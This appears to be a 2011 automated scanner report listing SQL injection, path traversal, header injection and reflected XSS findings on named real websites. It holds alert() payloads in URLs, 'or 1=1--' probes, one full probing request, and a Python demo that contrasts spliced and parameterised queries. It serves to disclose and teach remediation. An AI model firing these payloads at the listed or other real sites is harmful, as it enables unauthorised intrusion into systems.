XSS, SQL Injection, HTTP Header Injection, Path Traversal, DORK, PoC

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | CWE-23: Relative Path Traversal

Report generated by XSS.CX at Wed Apr 20 11:28:22 CDT 2011.



1. SQL injection

1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter]

1.4. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

1.5. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter]

1.6. http://visitordrive.com/evTracker/services/keywords.php [edate parameter]

1.7. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter]

1.8. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie]

1.9. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie]

1.10. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1]

1.11. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie]

1.12. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie]

1.13. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie]

1.14. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie]

1.15. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie]

1.16. http://www.curtis.com/favicon.ico [CFID cookie]

1.17. http://www.curtis.com/favicon.ico [CFTOKEN cookie]

1.18. http://www.curtis.com/favicon.ico [REST URL parameter 1]

1.19. http://www.curtis.com/favicon.ico [__utma cookie]

1.20. http://www.curtis.com/favicon.ico [__utmb cookie]

1.21. http://www.curtis.com/favicon.ico [__utmc cookie]

1.22. http://www.curtis.com/favicon.ico [__utmz cookie]

1.23. http://www.curtis.com/favicon.ico [sifrFetch cookie]

1.24. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1]

1.25. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2]

1.26. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3]

1.27. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1]

1.28. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2]

1.29. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1]

1.30. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2]

1.31. http://www.curtis.com/sitecontent.cfm [CFID cookie]

1.32. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie]

1.33. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1]

1.34. http://www.curtis.com/sitecontent.cfm [__utma cookie]

1.35. http://www.curtis.com/sitecontent.cfm [__utmb cookie]

1.36. http://www.curtis.com/sitecontent.cfm [__utmc cookie]

1.37. http://www.curtis.com/sitecontent.cfm [__utmz cookie]

1.38. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie]

1.39. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter]

1.40. http://www.millerwelds.com/about/ [REST URL parameter 1]

1.41. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter]

1.42. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

1.43. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2]

1.44. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter]

1.45. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

1.46. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]

1.47. http://www.millerwelds.com/financing/ [REST URL parameter 1]

1.48. http://www.millerwelds.com/financing/ [int_campaign parameter]

1.49. http://www.millerwelds.com/financing/ [int_content parameter]

1.50. http://www.millerwelds.com/financing/ [int_medium parameter]

1.51. http://www.millerwelds.com/financing/ [int_source parameter]

1.52. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter]

1.53. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

1.54. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

1.55. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

1.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

1.57. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

1.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

1.59. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

1.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

1.61. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6]

1.62. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

1.63. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9]

1.64. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

1.65. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

1.66. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2]

1.67. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

1.68. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2]

1.69. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter]

1.70. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

1.71. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2]

1.72. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3]

1.73. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter]

1.74. http://www.millerwelds.com/resources/ [REST URL parameter 1]

1.75. http://www.millerwelds.com/resources/ [name of an arbitrarily supplied request parameter]

1.76. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

1.77. http://www.millerwelds.com/service/ [REST URL parameter 1]

1.78. http://www.millerwelds.com/service/ [name of an arbitrarily supplied request parameter]

1.79. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

1.80. http://www.millerwelds.com/wheretobuy/ [name of an arbitrarily supplied request parameter]

1.81. http://www.socialfollow.com/button/image/ [b parameter]

2. File path traversal

2.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]

2.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]

3. HTTP header injection

3.1. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Leaderboard_RON [REST URL parameter 1]

3.2. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON [REST URL parameter 1]

3.3. http://ad.doubleclick.net/getcamphist [REST URL parameter 1]

3.4. http://ad.doubleclick.net/getcamphist [src parameter]

3.5. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 1]

3.6. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 2]

3.7. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 3]

3.8. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 1]

3.9. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 2]

3.10. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [REST URL parameter 3]

3.11. http://mp.apmebf.com/ad/js/16228-124632-26209-1 [S cookie]

3.12. http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359 [vmf parameter]

4. Cross-site scripting (reflected)

4.1. http://ads.adxpose.com/ads/ads.js [uid parameter]

4.2. http://btilelog.access.mapquest.com/tilelog/transaction [transaction parameter]

4.3. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

4.4. http://digg.com/submit [REST URL parameter 1]

4.5. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [callback parameter]

4.6. http://ds.addthis.com/red/psi/sites/www.curtis.com/p.json [callback parameter]

4.7. http://event.adxpose.com/event.flow [uid parameter]

4.8. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

4.9. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

4.10. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

4.11. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

4.12. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

4.13. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

4.14. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

4.15. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

4.16. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

4.17. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

4.18. http://jqueryui.com/themeroller/css/parseTheme.css.php [c95d2 parameter]

4.19. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

4.20. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

4.21. http://mochibot.com/my/core.swf [f parameter]

4.22. http://mochibot.com/my/core.swf [mv parameter]

4.23. http://mochibot.com/my/core.swf [sb parameter]

4.24. http://mochibot.com/my/core.swf [swfid parameter]

4.25. http://widgets.digg.com/buttons/count [url parameter]

4.26. http://www.arnoldporter.com/industries.cfm [name of an arbitrarily supplied request parameter]

4.27. http://www.arnoldporter.com/industries.cfm [nsextt parameter]

4.28. http://www.arnoldporter.com/industries.cfm [u parameter]

4.29. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

4.30. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

4.31. http://www.curtis.com/emaildisclaimer.cfm [itemID parameter]

4.32. http://www.curtis.com/emaildisclaimer.cfm [itemType parameter]

4.33. http://www.curtis.com/sitecontent.cfm [name of an arbitrarily supplied request parameter]

4.34. http://www.faegre.co.uk/11572 [REST URL parameter 1]

4.35. http://www.faegre.co.uk/11572 [name of an arbitrarily supplied request parameter]

4.36. http://www.faegre.co.uk/59 [REST URL parameter 1]

4.37. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]

4.38. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]

4.39. http://www.faegre.co.uk/bios [REST URL parameter 1]

4.40. http://www.faegre.co.uk/bios [name of an arbitrarily supplied request parameter]

4.41. http://www.faegre.co.uk/community [REST URL parameter 1]

4.42. http://www.faegre.co.uk/community [name of an arbitrarily supplied request parameter]

4.43. http://www.faegre.co.uk/eventtypes [REST URL parameter 1]

4.44. http://www.faegre.co.uk/eventtypes [name of an arbitrarily supplied request parameter]

4.45. http://www.faegre.co.uk/favicon.ico [REST URL parameter 1]

4.46. http://www.faegre.co.uk/getdoc.aspx [REST URL parameter 1]

4.47. http://www.faegre.co.uk/index.aspx [REST URL parameter 1]

4.48. http://www.faegre.co.uk/jscripts.js [REST URL parameter 1]

4.49. http://www.faegre.co.uk/rankingawards [REST URL parameter 1]

4.50. http://www.faegre.co.uk/rankingawards [name of an arbitrarily supplied request parameter]

4.51. http://www.faegre.co.uk/showlocation.aspx [REST URL parameter 1]

4.52. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

4.53. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

4.54. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

4.55. http://www.friedfrank.com/ [name of an arbitrarily supplied request parameter]

4.56. http://www.friedfrank.com/index.cfm [more parameter]

4.57. http://www.friedfrank.com/index.cfm [name of an arbitrarily supplied request parameter]

4.58. http://www.humaniplex.com/blogs/ [name of an arbitrarily supplied request parameter]

4.59. http://www.humaniplex.com/classifieds/ [name of an arbitrarily supplied request parameter]

4.60. http://www.humaniplex.com/clubs/list [REST URL parameter 2]

4.61. http://www.humaniplex.com/clubs/list [name of an arbitrarily supplied request parameter]

4.62. http://www.humaniplex.com/flirts/ [name of an arbitrarily supplied request parameter]

4.63. http://www.humaniplex.com/index.html [name of an arbitrarily supplied request parameter]

4.64. http://www.humaniplex.com/mingle [name of an arbitrarily supplied request parameter]

4.65. http://www.humaniplex.com/mingle/ [name of an arbitrarily supplied request parameter]

4.66. http://www.humaniplex.com/profiles/ [name of an arbitrarily supplied request parameter]

4.67. http://www.humaniplex.com/tos/site.html [qs parameter]

4.68. http://www.humaniplex.com/tos/site.html [qs parameter]

4.69. http://www.humaniplex.com/user_tools/forgot_password/ [name of an arbitrarily supplied request parameter]

4.70. http://www.humaniplex.com/user_tools/join/ [name of an arbitrarily supplied request parameter]

4.71. http://www.leaseweb.com/en [REST URL parameter 1]

4.72. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

4.73. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

4.74. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 1]

4.75. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 2]

4.76. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 3]

4.77. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 1]

4.78. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 2]

4.79. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 3]

4.80. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 1]

4.81. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 2]

4.82. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 3]

4.83. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 4]

4.84. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 5]

4.85. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [name of an arbitrarily supplied request parameter]

4.86. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 1]

4.87. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 2]

4.88. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 1]

4.89. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 2]

4.90. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

4.91. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

4.92. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

4.93. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 1]

4.94. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 2]

4.95. http://www.leaseweb.com/nl/maatwerk-oplossingen/private-cloud [REST URL parameter 3]

4.96. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 1]

4.97. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 2]

4.98. http://www.leaseweb.com/nl/over-ons/klanten [REST URL parameter 3]

4.99. http://www.leaseweb.com/osdd.xml [REST URL parameter 1]

4.100. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 1]

4.101. http://www.leaseweb.com/xml/lsw_en_bannerhome.xml [REST URL parameter 2]

4.102. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

4.103. https://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

4.104. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 1]

4.105. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 2]

4.106. https://www.leaseweb.com/en/shopping-cart/login [REST URL parameter 3]

4.107. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

4.108. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

4.109. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

4.110. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

4.111. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

4.112. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

4.113. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

4.114. http://www.martindale.com/Results.aspx [ft parameter]

4.115. http://www.martindale.com/Results.aspx [ft parameter]

4.116. http://www.martindale.com/Results.aspx [hid parameter]

4.117. http://www.martindale.com/Results.aspx [sh parameter]

4.118. http://www.millerwelds.com/about/ [REST URL parameter 1]

4.119. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

4.120. http://www.millerwelds.com/financing/ [REST URL parameter 1]

4.121. http://www.millerwelds.com/financing/ [int_campaign parameter]

4.122. http://www.millerwelds.com/financing/ [int_content parameter]

4.123. http://www.millerwelds.com/financing/ [int_medium parameter]

4.124. http://www.millerwelds.com/financing/ [int_source parameter]

4.125. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

4.126. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

4.127. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

4.128. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]

4.129. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

4.130. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

4.131. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]

4.132. http://www.millerwelds.com/resources/ [REST URL parameter 1]

4.133. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]

4.134. http://www.millerwelds.com/service/ [REST URL parameter 1]

4.135. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]

4.136. http://www.mypowerblock.com/xn/loader [r parameter]

4.137. http://www.nike.com/nikeos/p/nikegolf/en_US/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D5)%3C/script%3E parameter]

4.138. http://www.nike.com/nikeos/p/nikegolf/en_US/ [name of an arbitrarily supplied request parameter]

4.139. http://www.nike.com/nikeos/p/usnikefootball/lang_LO/utilities/compress [includes parameter]

4.140. http://www.nike.com/nsl/services/user/isloggedin [REST URL parameter 4]

4.141. http://www.nike.com/nsl/services/user/isloggedin [callback parameter]

4.142. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

4.143. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

4.144. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

4.145. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

4.146. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [h parameter]

4.147. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [w parameter]

4.148. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

4.149. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

4.150. http://www.rockyou.com/developer/opensocial/opensocial-css.php [name of an arbitrarily supplied request parameter]

4.151. http://www.rockyou.com/developer/opensocial/opensocial-css.php [title parameter]

4.152. http://www.rockyou.com/login/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E parameter]

4.153. http://www.rockyou.com/login/ [name of an arbitrarily supplied request parameter]

4.154. http://www.rockyou.com/login/index.php [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E parameter]

4.155. http://www.rockyou.com/login/index.php [name of an arbitrarily supplied request parameter]

4.156. http://www.rockyou.com/show_my_gallery.php [instanceid parameter]

4.157. http://www.socialfollow.com/button/ [b parameter]

4.158. http://www.socialfollow.com/button/ [b parameter]

4.159. http://www.socialfollow.com/button/css/ [b parameter]

4.160. http://www.socialfollow.com/button/css/ [socialSites parameter]

4.161. http://www.socialfollow.com/login.php [tEmail parameter]

4.162. http://www.viglink.com/users/login [ar parameter]

4.163. http://www.viglink.com/users/login [ar parameter]

4.164. https://www.viglink.com/users/login [ar parameter]

4.165. https://www.viglink.com/users/login [ar parameter]

4.166. http://www.ypg.com/en [REST URL parameter 1]

4.167. http://www.ypg.com/en/ [REST URL parameter 1]

4.168. http://www.ypg.com/en/contact-us [REST URL parameter 1]

4.169. http://www.ypg.com/en/contact-us [REST URL parameter 2]

4.170. http://www.ypg.com/en/contact-us [name of an arbitrarily supplied request parameter]

4.171. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 1]

4.172. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 2]

4.173. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 3]

4.174. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

4.175. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

4.176. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

4.177. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

4.178. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [name of an arbitrarily supplied request parameter]

4.179. http://www.ypg.com/en/images/loading.gif [REST URL parameter 1]

4.180. http://www.ypg.com/en/images/loading.gif [REST URL parameter 2]

4.181. http://www.ypg.com/en/images/loading.gif [REST URL parameter 3]

4.182. http://www.ypg.com/en/images/loading.gif [name of an arbitrarily supplied request parameter]

4.183. http://www.ypg.com/images/imageresizer.php [REST URL parameter 1]

4.184. http://www.ypg.com/images/imageresizer.php [REST URL parameter 2]

4.185. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 1]

4.186. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 2]

4.187. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 3]

4.188. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 4]

4.189. http://www.zoomerang.com/Survey/TinyMCE.ashx [font parameter]

4.190. http://mochibot.com/my/core.swf [Referer HTTP header]

4.191. http://www.arnoldporter.com/ [Referer HTTP header]

4.192. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

4.193. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

4.194. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

4.195. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

4.196. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

4.197. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

4.198. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

4.199. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

4.200. http://www.friedfrank.com/ [User-Agent HTTP header]

4.201. http://www.friedfrank.com/includes/vcard.cfm [User-Agent HTTP header]

4.202. http://www.friedfrank.com/index.cfm [User-Agent HTTP header]

4.203. http://www.friedfrank.com/printfriendly.cfm [User-Agent HTTP header]



1. SQL injection
There are 81 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective. Doubling up single quotation marks in user input only protects values that are placed inside a quoted string literal: a numeric value is typically not quoted at all, so a single space is enough to break out of the data context, and data that was escaped on its way into the database comes back in its original form when it is later read out and reused in another query (second-order injection). Stored procedures are not a guarantee either: SQL that is built dynamically inside a procedure is just as injectable as any other dynamic SQL, and a sound procedure can still be invoked unsafely with user-controllable data.
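
As an added illustration of the remediation (example code written for this page, not part of the scanner report or of any site listed in it): a constructed SQLite table standing in for whatever lookup sits behind an endpoint like /ads/, the vulnerable string-spliced query beside its parameterised form, the quote-doubling mitigation in a numeric context where it achieves nothing, and a true/false probe of the kind the scanner ran, applied to each variant. Table and column names are invented for the example.

```python
import sqlite3

# Constructed sample data (not from the report): an ad-placement lookup keyed by
# a request parameter, standing in for the query behind an endpoint like /ads/.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE placements (pl TEXT PRIMARY KEY, creative_id INTEGER)")
    conn.executemany("INSERT INTO placements VALUES (?, ?)",
                     [("bfacb5d2", 321611), ("0badc0de", 999999)])
    conn.commit()
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, pl: str) -> list:
    # Tainted value spliced into the query text: the quote in the payload closes
    # the string literal, the rest is parsed as SQL, and "--" comments out the tail.
    sql = "SELECT creative_id FROM placements WHERE pl = '" + pl + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterised(conn: sqlite3.Connection, pl: str) -> list:
    # Query structure is fixed first; the value is bound afterwards and can only
    # ever be compared as data, whatever characters it contains.
    sql = "SELECT creative_id FROM placements WHERE pl = ?"
    return [row[0] for row in conn.execute(sql, (pl,))]

def lookup_quote_doubled_numeric(conn: sqlite3.Connection, creative_id: str) -> list:
    # The "double up the quotes" mitigation: it does nothing for a numeric
    # context, because the value is never inside quotes in the first place.
    escaped = creative_id.replace("'", "''")
    sql = "SELECT pl FROM placements WHERE creative_id = " + escaped
    return [row[0] for row in conn.execute(sql)]

def boolean_probe(lookup, true_payload: str, false_payload: str) -> bool:
    """Difference-based test of the kind the scanner ran: the same request with a
    true and a false condition. True means the two results differ, i.e. the
    condition reached the SQL parser and was evaluated."""
    conn = make_db()
    try:
        return lookup(conn, true_payload) != lookup(conn, false_payload)
    except sqlite3.Error:
        # A database error is a signal too, but not the boolean one measured here.
        return False
    finally:
        conn.close()

# Payload pairs: the quoted-string pair the scanner used, and a numeric-context pair.
STRING_TRUE, STRING_FALSE = "12883928' or 1=1-- ", "12883928' or 1=2-- "
NUMERIC_TRUE, NUMERIC_FALSE = "0 or 1=1", "0 or 1=2"

if __name__ == "__main__":
    print("vulnerable string context :", boolean_probe(lookup_vulnerable, STRING_TRUE, STRING_FALSE))
    print("parameterised             :", boolean_probe(lookup_parameterised, STRING_TRUE, STRING_FALSE))
    print("quotes doubled, numeric   :", boolean_probe(lookup_quote_doubled_numeric, NUMERIC_TRUE, NUMERIC_FALSE))
```

The probe reports True for the spliced query (all rows versus none) and for the quote-doubled numeric query, and False for the parameterised one, where both payloads are simply compared as literal strings and match nothing.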



1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12883928'%20or%201%3d1--%20 and 12883928'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, which the scanner takes as an indication that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance, the portions of the two responses shown below differ only in per-request values (the ord= cache-busters, the freshly issued ID and UA cookies, Date and Content-Length) and in the s= click-tracking blob inside the click URL, which encodes the request's own query string, submitted parameter name included: decoded, the blob in Response 1 ends in the text "&112883928' or 1=1-- =1" and the one in Response 2 in "&112883928' or 1=2-- =1". The observed difference is therefore explained by the parameter being reflected, not evaluated, which is consistent with the Tentative confidence rating.

Request 1

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
